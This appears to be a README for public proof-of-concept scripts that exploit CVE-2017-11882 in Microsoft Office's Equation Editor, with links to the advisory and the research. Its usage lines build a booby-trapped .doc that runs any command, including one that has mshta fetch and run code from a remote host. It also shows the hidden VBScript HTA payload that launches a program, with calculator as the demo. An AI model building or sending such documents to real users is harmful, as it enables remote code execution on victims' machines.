43b 原脚本来自于 https://github.com/embedi/CVE-2017-11882
109b 原脚本来自于 https://github.com/unamer/CVE-2017-11882/ (膜一波,现在unamer的代码已经可以执行shellcode了~)
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
use mshta
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
abc
<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <HEAD> <script language="VBScript"> Window.ReSizeTo 0, 0 Window.moveTo -2000,-2000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "calc.exe" self.close </script> <body> demo </body> </HEAD> </HTML>
43b命令长度不能超过43 bytes,109b命令长度不能超过109 bytes
example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.